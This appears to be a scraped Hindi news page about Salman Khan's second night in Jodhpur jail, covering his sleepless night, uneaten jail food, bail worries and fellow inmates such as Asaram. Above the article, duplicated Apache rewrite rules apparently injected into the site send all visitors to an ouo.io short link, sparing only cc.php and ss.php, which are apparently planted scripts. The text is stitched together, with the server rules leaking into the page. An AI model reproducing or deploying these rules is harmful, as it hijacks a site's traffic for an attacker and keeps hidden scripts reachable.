
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 440
जोधपुर। बॉलीवुड अभिनेता सलमान खान की दूसरी रात करवटें बदलते ही निकली। जेल में मच्छर ज्यादा होने के कारण वे सारी रात चैन से नहीं सो पाए। ऐशोआराम की जिंदगी जीने वाल सलमान लिए जेल में रात गुजारना बेहद मुश्किल हो रहा है। सलमान अपनी बेल को लेकर कल रात भी काफी परेशान रहें। लेकिन, उन्हें जब पता चला कि उनकी जमानत याचिका पर सुनवाई करने वाले जज का तबादला हो गया तो वे काफी मायूस हो गए। सलमान ने रात को भी खाना नहीं खाया और रातभर करवटें बदलते रहे। कैदी नंबर 106 यानी सलमान खान को अभी तक जेल की वर्दी नहीं मिली है और वो अभी अपने ही कपड़े पहने हुए हैं। शाम को करीब दो घंटे तक सलमान ने जेल में कसरत किया। उसके बाद उन्होंने थोड़ा आराम किया। जेल में कल लौकी की सब्जी, दाल और रोटी बनी थी। लेकिन सूत्रों की मानें तो सलमान ने जेल का खाना नहीं खाया। कल दोपहर सलमान की बहन अलवीरा और अर्पिता उनके लिए बाहर से खाना लेकर गई थी। जिसे सलमान ने कल जेल में आखिरी बार खाया था।
सलमान खान जिस जेल में बंद है उसी जेल में दुष्कर्म आरोपी आसाराम बापू, भंवरी देवी हत्या मामले में आरोपी मलखान सिंह बिश्नोई और हाल ही में एक मुस्लिम मजदूर की हत्या के आरोप में गिरफ्तार शंभू लाल रैगर बंद हैं। सलमान खान को जेल में बैरक नंबर 2 में रखा गया है जबकि उनके पास ही बैरक नबंर एक में आसाराम को रखा गया है।